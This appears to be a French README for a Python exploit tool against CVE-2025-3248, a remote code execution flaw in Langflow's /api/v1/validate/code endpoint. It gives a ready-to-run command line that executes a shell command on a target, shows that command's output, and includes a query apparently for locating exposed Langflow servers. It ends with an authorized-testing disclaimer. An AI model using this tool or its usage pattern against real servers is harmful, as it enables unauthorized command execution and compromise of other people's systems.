
CVE-2025-3248 Langflow RCE Exploit
Exploit d'exécution de code à distance (RCE) pour les applications Langflow vulnérables à CVE-2025-3248.
Point d'accès affecté :
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() dynamique dans un chemin de code contrôlé par l'utilisateurapp="Langflow"
Cet outil est destiné uniquement à des fins de tests de sécurité éducatifs et autorisés. Toute utilisation non autorisée est interdite.